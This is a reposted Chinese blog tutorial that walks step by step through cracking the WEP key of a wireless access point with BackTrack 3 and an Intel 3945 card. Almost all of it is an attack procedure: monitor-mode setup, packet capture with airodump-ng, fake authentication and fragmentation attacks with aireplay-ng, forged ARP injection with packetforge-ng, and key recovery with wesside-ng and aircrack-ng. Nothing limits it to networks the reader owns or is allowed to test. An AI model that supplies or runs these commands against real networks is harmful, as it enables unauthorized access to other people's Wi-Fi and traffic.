机器自带的intel网卡破解WEP(转文)

BT3下Intel Proset 3945abg网卡破解wep实战
2008-09-10 20:41:42 浏览(6239)

注1：经过N天的实际操作，无客户端的WEP破解基本上是无法实现的（运行airodump-ng �ivs �w abc（abc是存盘的文件名）
-c （channel号） 网卡名时#data数为0）。

注2：无客户端的概念：只有AP开着，AP下没有任何有线或无线的网络连接。

注3：BT3下运行Kismet的方法：

#ifconfig wlan0 up

#airmon-ng

显示无线网卡为iwl3945

#modprobe �r iwl3945

#modprobe ipwraw

#iwconfig

显示无线网卡已变成wifi0、monitor mode

编辑/usr/local/etc/kismen.conf文件，把source改为source=iwl3945,wifi0,Intel

存盘。

#kismet

用"s"、"f"、"i"显示单个AP的详细信息。

1. 环境：DELL M1210、Intel Proset 3945 a/b/g无线网卡

2. 下载BT3，解压到U盘（根下BOOT、BT3目录）

3. 运行BOOT下的bootinst.bat，制作U盘启动

4. reboot PC，按F12进入BOOT MENU，选USB

5. 进入BT3菜单，选BT3 Graphics mode (compiz Nvidia)-Experimental

6. 打开一个shell

7. #ifconfig �a（记下本机网卡MAC）

8. 显示无线网卡为wlan0

9. #ifconfig wlan0 up

10. #airmon-ng

11. 显示无线网卡为iwl3945

12. #modprobe �r iwl3945

13. #modprobe ipwraw

#airmon-ng start wifi0 6 将网卡设置成AP监听模式

14. #iwconfig

15. 显示无线网卡已变成wifi0、monitor mode

继续:

1. # airodump-ng --ivs -w name -c 6 wifi0（name是存盘的文件名，6是cannel号）

2. 显示要破解的ap的essid 和mac ，并记下ap的essid 和mac。（#data为0时则为无客户端AP，不能继续）

3. 不关闭这个shell，另开一个shell

4. #aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

5. 显示以下信息则为成功

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful :-)

21．#aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件

如果一切顺利，系统将显示

Use this packet ?

输入y回车，将得到一个xor文件（以fragment开头）

再输入ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。

22．#packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l
255.255.255.255 -y fragment -****-****.xor -w mrarp
其中，-l中的l是L的小写，别和1混淆，而其中的fragment-****-****.xor是刚才生成的文件名。

系统显示：Wrote packet to: mrarp

23．#aireplay-ng -2 �r mrarp -x 1024 wifi0(-x 1024 是限定发包速度，避免网卡死机，选择1024)

输入y回车

前面的抓包窗口上的#data将迅速增加

24．另开shell

25．#wesside-ng �i wifi0 �v ap的MAC，破解完成。

26．到#data增加到3万以上时，另开shell

27．#aircrack-ng -n 64 -b ap的mac name-01.ivs

其中64是64位密码，如果是128位，换成128即可。

(注:摘之网文,还有许多破解方法,破解步骤都差不多,要灵活变通,如有疑问,请多交流.)

蓝色命令为主要执行命令
投稿：技术
评论(1) | 浏览(6239) | 收藏到我的网摘 | 邀请好友阅读